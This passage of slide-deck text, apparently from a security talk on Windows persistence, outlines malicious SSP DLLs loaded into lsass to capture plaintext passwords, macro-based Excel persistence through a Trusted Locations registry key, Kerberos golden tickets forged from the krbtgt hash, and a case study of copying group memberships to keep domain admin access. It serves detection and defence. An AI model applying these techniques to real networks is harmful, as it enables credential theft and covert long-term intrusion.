  • 101. Security Support Provider ◉ SSP/AP ○ Can serve tasks of SSPs and APs - loaded into lsass at boot ○ Example: Kerberos and msv1_0 (NTLM)
  • 102. Security Support Provider ◉ Install your own SSP that is loaded into lsass.exe ◉ Can develop your own SSP DLL ◉ Use Persistence module in PowerSploit to install your malicious SSP
  • 103. Security Support Provider ◉ Ben Delpy (@gentilkiwi) added SSP functionality into mimilib.dll ○ Once installed and loaded into lsass.exe, it captures plaintext passwords
  • 104.
  • 105.
  • 106. Excel Magic ◉ Malicious macro executes backdoor ◉ How can you ensure persistence? ○ Most users will run Excel once a day ○ You can use any “old school” techniques to spawn Excel ○ Disable macro settings to run macro without user prompt
  • 107. Excel Magic ◉ Registry modification that opens specific Workbook upon starting Excel ○ HKEY_CURRENT_USERSoftwareMicrosoftOffice12.0Ex celSecurityTrusted Locations ○ Just add the location
  • 108.
  • 109.
  • 110.
  • 112. Golden Tickets ◉ Method was developed with Ben Delpy and Sean Metcalf ◉ Forges a “golden” kerberos ticket which can be good for 10 years! ◉ Golden tickets provide on-demand domain privilege “upgrades” for any group within the domain
  • 113. Golden Tickets ◉ Only need four pieces of information ○ Domain SID ○ Name of the domain ○ User you want to create a ticket for ○ Krbtgt account hash ◉ You can build your ticket at home, offline
  • 114.
  • 115.
  • 116.
  • 117. Golden Ticket Takeaways ◉ If impersonating an account, tickets are still valid even if password changes ◉ Valid for as long as you specify (10 year default) ◉ Domain trusts ○ Child domains can compromise the parent ◉ Only way to stop is change krbtgt hash… twice… ◉ Or rebuild from bare metal
  • 118. Account Checkout - Case Study ◉ Client had account checkout system for domain administrator accounts ◉ Only two users with access to checkout system ◉ System requires 2FA ◉ DA access is lost if user changes their password/pin/token ◉ Users can see checked out accounts
  • 119.
  • 120. Account Checkout - Case Study ◉ Persist domain administrator without getting caught ○ Can’t continuously check out accounts ◉ Password vault permissions were managed through Active Directory groups ○ Tons of them
  • 121. Account Checkout - Case Study ◉ Copy group memberships to a compromised user account ○ User doesn’t use the Password Vault ■ All changes were documented ◉ This gave us all the permissions we needed without needing access to their Password Vault
  • 122. Account Checkout - Case Study ◉ Copy group memberships to a compromised user account ○ User doesn’t use the Password Vault ■ All changes were documented ◉ This gave us all the permissions we needed without needing access to their Password Vault
  • 124. Conclusions ◉ Persistence will remain rampant ◉ Always new and creative ways to maintain persistence ◉ Understanding persistence techniques is critical to detecting attacker access